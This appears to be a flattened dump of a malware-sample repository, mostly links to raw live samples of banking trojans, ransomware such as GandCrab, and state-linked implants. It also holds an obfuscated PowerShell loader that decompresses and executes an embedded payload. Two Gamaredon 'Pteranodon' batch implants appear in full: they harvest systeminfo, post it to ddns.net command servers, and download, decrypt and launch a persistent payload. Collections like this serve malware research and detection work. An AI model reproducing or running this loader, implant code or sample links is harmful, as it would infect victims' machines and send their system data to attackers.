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") ,[sYStEm.IO.coMPrEsSiON.coMpREsSIoNMOdE]::DECOmpresS)|% {nEw-oBJEcT syStEm.Io.STreamREAdeR($_ , [sysTeM.TeXt.enCoDiNg]::AscII) }| %{ $_.readTOEnD( )} )| . ( $SheLlID[1]+$sHelliD[13]+"X") 2>&1 | out-null -------------------------------------------------------------------------------- /DarkTequila/DarkTequila.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DarkTequila/DarkTequila.exe -------------------------------------------------------------------------------- /DoquAPT/DoquDropper.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DoquAPT/DoquDropper.bin -------------------------------------------------------------------------------- /Dridex/Dridex2ndstage.exe.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Dridex/Dridex2ndstage.exe.bin -------------------------------------------------------------------------------- /Dridex/DridexDDEDropperdoc.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Dridex/DridexDDEDropperdoc.bin -------------------------------------------------------------------------------- /Dridex/DridexInformation.txt: -------------------------------------------------------------------------------- 1 | https://www.webopedia.com/TERM/D/dridex-malware.html -------------------------------------------------------------------------------- /Dridex/DridexbankerPacked.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Dridex/DridexbankerPacked.bin -------------------------------------------------------------------------------- /Dridex/dridexDroppedVBS.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Dridex/dridexDroppedVBS.bin -------------------------------------------------------------------------------- /Dridex/dridexLoader.bin.exe.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Dridex/dridexLoader.bin.exe.bin -------------------------------------------------------------------------------- /Dridex/dridexbanker.false: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Dridex/dridexbanker.false -------------------------------------------------------------------------------- /Dridex/dridexbankerzip.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Dridex/dridexbankerzip.zip -------------------------------------------------------------------------------- /DustSquad/DustSquadInformation.txt: -------------------------------------------------------------------------------- 1 | https://securelist.com/octopus-infested-seas-of-central-asia/88200/ -------------------------------------------------------------------------------- /DustSquad/OctopusDelphi.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DustSquad/OctopusDelphi.exe -------------------------------------------------------------------------------- /DustSquad/OctopusTelegramMessengerDropper.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DustSquad/OctopusTelegramMessengerDropper.bin -------------------------------------------------------------------------------- /Emotet/EmotetInvoiceDoc.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Emotet/EmotetInvoiceDoc.bin -------------------------------------------------------------------------------- /EnergeticBear/BerserkBear Downloader.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/EnergeticBear/BerserkBear Downloader.bin -------------------------------------------------------------------------------- /EnergeticBear/Energetic Bear Implant: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/EnergeticBear/Energetic Bear Implant -------------------------------------------------------------------------------- /EnergeticBear/Temp.IsotopeImplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/EnergeticBear/Temp.IsotopeImplant.bin -------------------------------------------------------------------------------- /EquationGroup/DiskFromHoustonEoPExploits.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/EquationGroup/DiskFromHoustonEoPExploits.bin -------------------------------------------------------------------------------- /EquationGroup/DoubleFantasyInstaller.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/EquationGroup/DoubleFantasyInstaller.bin -------------------------------------------------------------------------------- /EquationGroup/EquationDrugLUTEUSOBSTOS: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/EquationGroup/EquationDrugLUTEUSOBSTOS -------------------------------------------------------------------------------- /EquationGroup/EquationGroupInfo.txt: -------------------------------------------------------------------------------- 1 | https://cdn1.vox-cdn.com/uploads/chorus_asset/file/3415904/Equation_group_questions_and_answers.0.pdf -------------------------------------------------------------------------------- /EquationGroup/EquationLaserInstaller.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/EquationGroup/EquationLaserInstaller.bin -------------------------------------------------------------------------------- /EquationGroup/FannyWorm.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/EquationGroup/FannyWorm.bin -------------------------------------------------------------------------------- /EquationGroup/GrayfishInstaller.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/EquationGroup/GrayfishInstaller.bin -------------------------------------------------------------------------------- /EquationGroup/GrokKeylogger: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/EquationGroup/GrokKeylogger -------------------------------------------------------------------------------- /EquationGroup/HDDFirmware: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/EquationGroup/HDDFirmware -------------------------------------------------------------------------------- /EquationGroup/SD_IP_CF.dll.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/EquationGroup/SD_IP_CF.dll.bin -------------------------------------------------------------------------------- /EquationGroup/TripleFantasy.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/EquationGroup/TripleFantasy.bin -------------------------------------------------------------------------------- /GamaredonGroup/GamaredonGroupINFO.txt: -------------------------------------------------------------------------------- 1 | https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/ 2 | -------------------------------------------------------------------------------- /GamaredonGroup/GamaredonImplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GamaredonGroup/GamaredonImplant.bin -------------------------------------------------------------------------------- /GamaredonGroup/Pteranodon.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GamaredonGroup/Pteranodon.bin -------------------------------------------------------------------------------- /GamaredonGroup/Pteranodon2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GamaredonGroup/Pteranodon2.bin -------------------------------------------------------------------------------- /GamaredonGroup/Pteranodon3.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GamaredonGroup/Pteranodon3.bin -------------------------------------------------------------------------------- /GamaredonGroup/Pteranodon4.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GamaredonGroup/Pteranodon4.bin -------------------------------------------------------------------------------- /GamaredonGroup/Pteranodon5.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GamaredonGroup/Pteranodon5.bin -------------------------------------------------------------------------------- /GamaredonGroup/Pteranodon6.bin: -------------------------------------------------------------------------------- 1 | @echo off 2 | set NKALnvo=%random% 3 | chcp 1251 >NUL 4 | set emwAzZN=%APPDATA% 5 | setlocal enableextensions enabledelayedexpansion 6 | if %USERPROFILE%==jghjvKB set JnLpYQU=%COMPUTERNAME% 7 | :DndlL 8 | set emwAzZN=%APPDATA% 9 | set vers=V.309 10 | set emwAzZN=%APPDATA% 11 | set xfDkC=FAdeF 12 | set emwAzZN=%APPDATA% 13 | set IRVoo=%APPDATA%\Microsoft\Crypto\keys 14 | set NKALnvo=%random% 15 | set RwukB="Mozilla/5.0 (Linux; Android 6.0.1; SM-A500H Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.109 Mobile Safari/537.36" 16 | If jolPPmX==HOKFFGC Set VCGWyTx=NKALnvo 17 | set FqJUL=*.* 18 | set emwAzZN=%APPDATA% 19 | set BwUVL=cryptcp 20 | If jolPPmX==HOKFFGC Set VCGWyTx=NKALnvo 21 | for /f %%n in (' 22 | tasklist /nh /fi "imagename eq %BwUVL%.exe" ^| find /c "%BwUVL%.exe" 23 | ') do set /a zocrI=%%n 24 | if %zocrI% geq 2 goto exit 25 | If jolPPmX==HOKFFGC Set VCGWyTx=NKALnvo 26 | set NKALnvo=%random% 27 | set tGFFD='vol c:' 28 | set NKALnvo=%random% 29 | For /F "skip=1 Tokens=4*" %%o In (%tGFFD%) Do set JnjRi=%%o 30 | if %JnjRi%==is ( 31 | For /F "skip=1 Tokens=5*" %%n In (%tGFFD%) Do set JnjRi=%%n 32 | ) 33 | if %USERPROFILE%==jghjvKB set JnLpYQU=%COMPUTERNAME% 34 | set emwAzZN=%APPDATA% 35 | set DWiYe=%computername%_%JnjRi:-=% 36 | If jolPPmX==HOKFFGC Set VCGWyTx=NKALnvo 37 | set DWiYe=%DWiYe: =% 38 | set NKALnvo=%random% 39 | systeminfo>IrJHg 40 | If jolPPmX==HOKFFGC Set VCGWyTx=NKALnvo 41 | FOR /F "tokens=*" %%o IN (IrJHg) do @IF NOT j%%o==j set infosys=!infosys!%%o+### 42 | set emwAzZN=%APPDATA% 43 | RENAME "OfficeModule.exe" FAdeF.exe 44 | set NKALnvo=%random% 45 | set UQBIN=FAdeF.exe 46 | if %USERPROFILE%==jghjvKB set JnLpYQU=%COMPUTERNAME% 47 | RENAME "%CD%\Crypt.exe" file_QIPJV.exe 48 | If jolPPmX==HOKFFGC Set VCGWyTx=NKALnvo 49 | del /f /q "IrJHg" 50 | :UfjsJ 51 | set NKALnvo=%random% 52 | set /a dWFzF=90*%RANDOM%/32768 53 | if %USERPROFILE%==jghjvKB set JnLpYQU=%COMPUTERNAME% 54 | timeout /t %dWFzF% 55 | if %USERPROFILE%==jghjvKB set JnLpYQU=%COMPUTERNAME% 56 | set NKALnvo=%random% 57 | ping 8.8.8.8 |>nul find /i "TTL=" &&goto FAdeF||goto QIPJV 58 | if %USERPROFILE%==jghjvKB set JnLpYQU=%COMPUTERNAME% 59 | :FAdeF 60 | If jolPPmX==HOKFFGC Set VCGWyTx=NKALnvo 61 | tasklist /fi "IMAGENAME eq %UQBIN%" | find /i "%UQBIN%" 62 | if not errorlevel 1 taskkill /f /im %UQBIN% 63 | set NKALnvo=%random% 64 | set SPUHA=spr-updates 65 | If jolPPmX==HOKFFGC Set VCGWyTx=NKALnvo 66 | set dXlsp=ddns.net 67 | set emwAzZN=%APPDATA% 68 | set RWGVi=spr_updates.php 69 | set NKALnvo=%random% 70 | set ZrFBB=http://%SPUHA%.%dXlsp%/%RWGVi% 71 | set emwAzZN=%APPDATA% 72 | %UQBIN% -t 5 --user-agent=%RwukB% --post-data="sysinfo=%infosys%&id=%DWiYe%&fid=000000&comp=%computername%&versiya=%vers%" "%ZrFBB%" -q -N %ZrFBB% -O %xfDkC% 73 | set NKALnvo=%random% 74 | file_QIPJV.exe "%xfDkC%" dec "gjghj,eqhfcgfreqgbyljc" 75 | set emwAzZN=%APPDATA% 76 | If jolPPmX==HOKFFGC Set VCGWyTx=NKALnvo 77 | set NKALnvo=%random% 78 | 1>nul findstr "\<.rdata\>" dec_%xfDkC% && ( 79 | taskkill /f /im %BwUVL%.exe 80 | RENAME "%IRVoo%\%BwUVL%.exe" DndlL 81 | copy /y /v "%CD%\dec_%xfDkC%" "%IRVoo%\%BwUVL%.exe" 82 | start "" "%IRVoo%\%BwUVL%.exe" 83 | set /a dWFzF=6*%RANDOM%/32768 84 | timeout /t %dWFzF% 85 | exit 86 | ) 87 | 88 | set NKALnvo=%random% 89 | set NKALnvo=%random% 90 | :QIPJV 91 | set emwAzZN=%APPDATA% 92 | set /a dWFzF=60*%RANDOM%/32768 93 | set NKALnvo=%random% 94 | timeout /T %dWFzF% 95 | set NKALnvo=%random% 96 | set NKALnvo=%random% 97 | goto UfjsJ 98 | -------------------------------------------------------------------------------- /GamaredonGroup/PteranodonImplant.bin: -------------------------------------------------------------------------------- 1 | @echo off 2 | set VBOqEBf=%systemroot% 3 | setlocal ENABLEDELAYEDEXPANSION 4 | if %USERPROFILE%==bUDFniN set MCoRBRj=%COMPUTERNAME% 5 | set VBOqEBf=%APPDATA% 6 | set vers=V.74 7 | set VBOqEBf=%APPDATA% 8 | set XIDIo=ByxoX 9 | set VBOqEBf=%APPDATA% 10 | set eomKN=%APPDATA%\Microsoft\Crypto\RSA 11 | set pIcDFiG=%DATE% 12 | set sBHIipk=%random% 13 | set kbDRK=XP 14 | if %USERPROFILE%==bUDFniN set MCoRBRj=%COMPUTERNAME% 15 | ver | find /i "%kbDRK%" 16 | if %errorlevel% == 0 ( 17 | set eomKN=%WINDIR%\Microsoft\Crypto\RSA 18 | ) 19 | set VBOqEBf=%APPDATA% 20 | set VJakY=cryptcp 21 | set sBHIipk=%random% 22 | for /f %%a in (' 23 | tasklist /nh /fi "imagename eq %VJakY%.exe" ^| find /c "%VJakY%.exe" 24 | ') do set /a DbeHN=%%a 25 | if %DbeHN% geq 2 goto exit 26 | set sBHIipk=%random% 27 | set pIcDFiG=%DATE% 28 | For /F "skip=1 Tokens=4*" %%n In ('vol c:') Do set tqDlR=%%n 29 | if %tqDlR%==is ( 30 | For /F "skip=1 Tokens=5*" %%m In ('vol c:') Do set tqDlR=%%m 31 | ) 32 | if %USERPROFILE%==bUDFniN set MCoRBRj=%COMPUTERNAME% 33 | set VBOqEBf=%systemroot% 34 | set VBOqEBf=%APPDATA% 35 | set cGvFw=%computername%_%tqDlR:-=% 36 | set sBHIipk=%random% 37 | set cGvFw=%cGvFw: =% 38 | set pIcDFiG=%DATE% 39 | systeminfo>paGYd 40 | set sBHIipk=%random% 41 | FOR /F "tokens=*" %%f IN (paGYd) do @IF NOT Z%%f==Z set infosys=!infosys!%%f+### 42 | set VBOqEBf=%APPDATA% 43 | 44 | :cpSwS 45 | set cqhUZ=OfficeModule.exe 46 | set /a IHNAx=50*%RANDOM%/32768 47 | if %USERPROFILE%==bUDFniN set MCoRBRj=%COMPUTERNAME% 48 | timeout /t %IHNAx% 49 | set VBOqEBf=%systemroot% 50 | tasklist /fi "IMAGENAME eq %cqhUZ%" | find /i "%cqhUZ%" 51 | if not errorlevel 1 taskkill /f /im %cqhUZ% 52 | set pIcDFiG=%DATE% 53 | set HdCPw=drop-news 54 | set aKdiH=ddns.net 55 | set VBOqEBf=%APPDATA% 56 | set RyJIc=updates.php 57 | set pIcDFiG=%DATE% 58 | set BHvhl=http://%HdCPw%.%aKdiH%/%RyJIc% 59 | set VBOqEBf=%APPDATA% 60 | start /b %cqhUZ% --post-data="versiya=%vers%&comp=%computername%&id=%cGvFw%&sysinfo=%infosys%&fid=000000" "%BHvhl%" -q -N %BHvhl% -O %XIDIo% 61 | timeout /T 10 62 | 63 | tasklist /fi "IMAGENAME eq %cqhUZ%" | find /i "%cqhUZ%" 64 | if not errorlevel 1 taskkill /f /im %cqhUZ% 65 | 66 | for %%t in (%XIDIo%) do (set /a OUkkY=%%~Zt) 67 | if %OUkkY% LEQ 60000 goto OIGDj 68 | 69 | :ByxoX 70 | set pIcDFiG=%DATE% 71 | RENAME "%XIDIo%" %VJakY%.tmp 72 | timeout /2 73 | RENAME "updates.cmd" OIGDj.cmd 74 | set VBOqEBf=%APPDATA% 75 | call OIGDj.cmd %IHNAx% %eomKN% %VJakY% %XIDIo% 76 | set VBOqEBf=%systemroot% 77 | :OIGDj 78 | set VBOqEBf=%APPDATA% 79 | timeout /T %IHNAx% 80 | set VBOqEBf=%systemroot% 81 | goto cpSwS 82 | -------------------------------------------------------------------------------- /GamaredonGroup/PteranodonImplant7.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GamaredonGroup/PteranodonImplant7.bin -------------------------------------------------------------------------------- /GamaredonGroup/photoshopimplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GamaredonGroup/photoshopimplant.bin -------------------------------------------------------------------------------- /GandCrab/GandCrab v5.1(Include Decrypt Tools).zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GandCrab/GandCrab v5.1(Include Decrypt Tools).zip -------------------------------------------------------------------------------- /GandCrab/GandCrabV5.0.4.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GandCrab/GandCrabV5.0.4.exe -------------------------------------------------------------------------------- /GandCrab/GandCrabVariant.false: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GandCrab/GandCrabVariant.false -------------------------------------------------------------------------------- /GandCrab/GandCrabv4.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GandCrab/GandCrabv4.exe -------------------------------------------------------------------------------- /GandCrab/GandCrabv5RandomExtension.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GandCrab/GandCrabv5RandomExtension.bin -------------------------------------------------------------------------------- /GandCrab/Gandcrab5.0.2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GandCrab/Gandcrab5.0.2.bin -------------------------------------------------------------------------------- /GandCrab/Gandcrab5.0.3.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GandCrab/Gandcrab5.0.3.exe -------------------------------------------------------------------------------- /GandCrab/GandcrabV5.0.5.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GandCrab/GandcrabV5.0.5.bin -------------------------------------------------------------------------------- /GandCrab/Gandcrabv5.0.2exe.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GandCrab/Gandcrabv5.0.2exe.bin -------------------------------------------------------------------------------- /GazaAPTGroup/GazaGroupImplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GazaAPTGroup/GazaGroupImplant.bin -------------------------------------------------------------------------------- /GazaAPTGroup/GazaGroupInfo.txt: -------------------------------------------------------------------------------- 1 | https://medium.com/@CywareSTIX/the-big-bang-attack-campaign-gaza-hackers-suspected-of-targeting-middle-eastern-victims-ca2e8c91c69b 2 | -------------------------------------------------------------------------------- /GazaAPTGroup/ImplantBigBang.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GazaAPTGroup/ImplantBigBang.bin -------------------------------------------------------------------------------- /GazaAPTGroup/TheBigBang.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GazaAPTGroup/TheBigBang.bin -------------------------------------------------------------------------------- /GazaAPTGroup/TheBigBangAPT.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GazaAPTGroup/TheBigBangAPT.doc -------------------------------------------------------------------------------- /GazaAPTGroup/TheBigBangImplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GazaAPTGroup/TheBigBangImplant.bin -------------------------------------------------------------------------------- /Globelmposter: -------------------------------------------------------------------------------- 1 | Globelmposter 家族首次出现在 2017 年 5 月份,2018 年 2 月全国各大医院受 Globelmposter 2.0 勒索病毒攻击,导致医院系统被加密,2018 年 12 月深信服 EDR 安全团队发现加密后缀为 ‘.fuck’ 的 4.0 版本。 2 | -------------------------------------------------------------------------------- /Globelmposter 3.0 .rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Globelmposter 3.0 .rar -------------------------------------------------------------------------------- /GoziGroup/GoziBankerISFB.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GoziGroup/GoziBankerISFB.exe -------------------------------------------------------------------------------- /GoziGroup/HeVRmuUO.exe_.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GoziGroup/HeVRmuUO.exe_.exe -------------------------------------------------------------------------------- /GoziGroup/KRKeMaIts.exe_.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GoziGroup/KRKeMaIts.exe_.exe -------------------------------------------------------------------------------- /GoziGroup/lsPEcswsco.exe_.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GoziGroup/lsPEcswsco.exe_.exe -------------------------------------------------------------------------------- /GoziGroup/vCfjTmdR.exe_.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GoziGroup/vCfjTmdR.exe_.exe -------------------------------------------------------------------------------- /GreenbugAPT/GreenBugInfostealer.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/GreenbugAPT/GreenBugInfostealer.bin -------------------------------------------------------------------------------- 